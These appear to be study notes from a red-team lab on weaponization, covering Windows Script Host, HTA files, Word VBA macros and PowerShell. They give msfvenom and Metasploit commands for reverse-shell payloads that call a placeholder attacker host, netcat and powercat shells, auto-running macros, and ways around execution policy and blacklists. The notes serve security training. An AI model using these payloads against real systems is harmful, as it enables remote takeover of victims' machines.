Weaponizatiion is when red teamers use their own crafted tools to exploit a target
Windows Scripting Host (WSH)
Windows scripting host is a built-in Windows administration tool that runs batch files to automate and manage tasks within the operating system. It uses VBScript
Showing a message box
Windows message box
run it in cmd:
wscript hello.vbs
Use it to run exe files
Run an exe file with VBScript
Execute it with wscript or cscript in cmd:
wscript c:\Users\thm\Desktop\calc.vbs
orcscript.exe c:\Users\thm\Desktop\calc.vbs
In case of blacklist, possible to rename in txt and still run it:
wscript /e:VBScript c:\Users\thm\Desktop\payload.txt
HTML Application (HTA)
Using and `ActiveXObject to execute cmd.exe
serve the payload
python3 -m http.server 8000
Visit the page from the target machine
and run it
Reverse shell
Create a reverse shell with msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP-ATTACK-MACHINE LPORT=443 -f hta-psh -o thm.hta
Launch a listener:
nc -lvp 443
The reverse shell is launched when the link is visited from the target machine
Possible to generate and serve HTA with Metasploit framework
use exploit/windows/misc/hta_server
and we need to set LHOST, LPORT, SRVHOST, Payload we can use this payloadwindows/meterpreter/reverse_tcp
When the link is visited in the target we get a meterpreter shell
Visual Basic for Application (VBA)
We need to use Word
We open Visual Basic Editor by selecting
view → macros
We can give a name to our macro and click create
We then can make another message box
We run the macro with F5
To execute it automatically we can use after the document is open we need to use AutoOpen and Document_open
we save the document in docm or doc
Execute a bin
Use msfvenom for VBA
We just need to copy the output in the file
We set the listener with msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
we set also LHOST and LPORTWhen the doc is open in the target machine we get a shell
Write something with powershell we open a text editor and put this inside:
Write-Output "something"
We save the file with .PS1 extension
We can execute it from the cmd:
powershell -File thm.ps1
Execution policy
See if we are restricted:
Change it:
Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
we can also bypassing when executing the script:
powershell -ex bypass -File script.ps1
Getting a reverse shell
We can use powercat
We set up a listener
nc -lvp 443
We launch powercat
powershell -c "powercat -c ATTACKING-MACHINE-IPP -p 443 -e cmd"
We should get a shell
A great tool to generate reverse shell payloads
Last updated